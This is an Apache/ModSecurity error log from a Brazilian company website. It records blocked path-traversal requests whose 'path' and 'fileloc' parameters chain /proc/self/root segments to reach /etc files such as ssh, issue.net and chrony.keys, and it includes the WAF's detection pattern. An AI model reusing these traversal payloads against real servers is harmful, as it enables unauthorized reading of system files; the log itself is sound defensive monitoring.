[Fri Mar 20 05:58:57.230794 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.241.31:51620] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0MUfqxLDW4GITHUkTM9QAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:59:01.522188 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.241.31:49060] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0MVfqxLDW4GITHUkTNAwAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:59:48.749241 2026] [mime_magic:error] [pid 7893:tid 140411641214720] (70014)End of file found: [client 57.141.18.51:52682] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:59:52.266110 2026] [mime_magic:error] [pid 10189:tid 140411641214720] (70014)End of file found: [client 74.7.241.31:49074] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/bin
[Fri Mar 20 06:00:02.772828 2026] [mime_magic:error] [pid 26799:tid 140411548894976] (70014)End of file found: [client 57.141.18.72:53450] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 06:00:02.822664 2026] [mime_magic:error] [pid 11167:tid 140411607643904] (70014)End of file found: [client 57.141.18.52:53452] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 06:00:10.325558 2026] [mime_magic:error] [pid 11167:tid 140411716749056] (70014)End of file found: [client 57.141.18.25:53712] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 06:00:24.236228 2026] [mime_magic:error] [pid 26799:tid 140411658000128] (70014)End of file found: [client 216.73.216.191:54476] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 06:00:40.810023 2026] [mime_magic:error] [pid 10189:tid 140411691570944] (70014)End of file found: [client 57.141.18.8:55194] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 06:00:56.949798 2026] [mime_magic:error] [pid 31215:tid 140411574073088] (70014)End of file found: [client 57.141.18.38:56162] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 06:02:02.101775 2026] [mime_magic:error] [pid 7235:tid 140411582465792] (70014)End of file found: [client 74.7.241.31:58232] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/usr/bin
[Fri Mar 20 06:02:02.690030 2026] [mime_magic:error] [pid 21219:tid 140411691570944] (70014)End of file found: [client 74.7.243.128:35700] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/sys/fs/cgroup/systemd/system.slice/sshd.service
[Fri Mar 20 06:03:51.431603 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.241.31:58670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Nd_qxLDW4GITHUkTOiAAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:03:56.945064 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.243.128:41222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0NfBCii7xarUs8iHZR1QAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:03:59.457244 2026] [:error] [pid 9818:tid 140411733534464] [client 74.7.243.128:36170] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Nf11pVZ5mVmJwsFMZZQAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:04:00.773855 2026] [:error] [pid 10189:tid 140411590858496] [client 74.7.243.128:56724] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0NgDJ3M9BSuKP7CAb_8wAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:04:03.160245 2026] [:error] [pid 10189:tid 140411708356352] [client 74.7.243.128:56736] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0NgzJ3M9BSuKP7CAb__gAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:04:04.401306 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:56746] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0NhNa6ubjKNq_cu4a8OwAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:04:06.674344 2026] [:error] [pid 21219:tid 140411666392832] [client 74.7.243.128:56754] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0NhfXLqtnMIWvjpaKEEAAAAok"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:04:36.948566 2026] [mime_magic:error] [pid 21219:tid 140411607643904] (70014)End of file found: [client 57.141.18.39:36108] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 06:05:40.504989 2026] [:error] [pid 9818:tid 140411725141760] [client 74.7.243.128:56766] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0N5F1pVZ5mVmJwsFMZ2QAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:05:41.898215 2026] [:error] [pid 7893:tid 140411666392832] [client 74.7.243.128:38052] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0N5RCii7xarUs8iHZSCgAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:05:43.269377 2026] [:error] [pid 21219:tid 140411582465792] [client 74.7.243.128:38058] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0N5_XLqtnMIWvjpaKETwAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:05:46.880530 2026] [:error] [pid 10189:tid 140411574073088] [client 74.7.243.128:38074] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0N6jJ3M9BSuKP7CAYA7AAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:05:48.234474 2026] [:error] [pid 31215:tid 140411708356352] [client 74.7.243.128:38090] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0N7AF0L0L-SsrnPo5R6QAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:05:49.575462 2026] [:error] [pid 11642:tid 140411565680384] [client 74.7.243.128:43912] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0N7bninkcc-iUj5ApIRwAAA5U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:06:08.601996 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.243.128:43922] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OAPqxLDW4GITHUkTO8gAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:06:11.123325 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.243.128:54394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OAhCii7xarUs8iHZSIwAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:06:13.641914 2026] [:error] [pid 7235:tid 140411733534464] [client 74.7.243.128:54408] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OBfqxLDW4GITHUkTO9gAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:06:15.910827 2026] [mime_magic:error] [pid 21219:tid 140411658000128] (70014)End of file found: [client 57.141.18.83:39554] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 06:06:16.019240 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:54410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OCNa6ubjKNq_cu4a8eQAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
